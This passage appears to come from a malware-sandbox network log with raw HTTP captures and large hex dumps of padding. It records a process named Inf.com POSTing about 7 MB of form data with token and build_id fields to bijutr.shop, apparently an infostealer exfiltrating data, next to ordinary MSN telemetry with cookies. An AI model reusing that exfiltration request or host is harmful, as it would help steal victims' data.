                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:39 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:41 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  32192.168.2.54999820.110.205.1194432372C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC1261OUTGET /c.gif?rnd=1735279295839&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=338156387e954518bddd6ad5da364bdb&activityId=338156387e954518bddd6ad5da364bdb&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=0A6FD663C8E04E24A976289B56E6D1F3&MUID=3918B198F66063F3328CA4FAF7676296 HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: c.msn.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                  Cookie: USRLOC=; MUID=3918B198F66063F3328CA4FAF7676296; _EDGE_S=F=1&SID=1DDB83DF79F56C08037C96BD787D6D0A; _EDGE_V=1; SM=T
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 10 Dec 2024 13:00:24 GMT
                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                  ETag: "9270eb7934bdb1:0"
                                                                                                                                                                                                                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                  X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                  P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                                  Set-Cookie: SM=C; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                  Set-Cookie: MUID=3918B198F66063F3328CA4FAF7676296; domain=.msn.com; expires=Wed, 21-Jan-2026 06:01:40 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                                  Set-Cookie: SRM_M=3918B198F66063F3328CA4FAF7676296; domain=c.msn.com; expires=Wed, 21-Jan-2026 06:01:40 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                  Set-Cookie: MR=0; domain=c.msn.com; expires=Fri, 03-Jan-2025 06:01:40 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                  Set-Cookie: ANONCHK=0; domain=c.msn.com; expires=Fri, 27-Dec-2024 06:11:40 GMT; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:40 GMT
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Content-Length: 42
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 01 00 2c 00 00 00 00 01 00 01 00 00 02 01 4c 00 3b
                                                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,L;


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  33192.168.2.550004188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC327OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GLFCJE3OP8YUAIWLN7GV
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 6990993
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 47 4c 46 43 4a 45 33 4f 50 38 59 55 41 49 57 4c 4e 37 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 47 4c 46 43 4a 45 33 4f 50 38 59 55 41 49 57 4c 4e 37 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 47 4c 46 43 4a 45 33 4f 50 38 59 55 41 49 57 4c 4e 37 47 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------GLFCJE3OP8YUAIWLN7GVContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------GLFCJE3OP8YUAIWLN7GVContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------GLFCJE3OP8YUAIWLN7GVCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:40 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
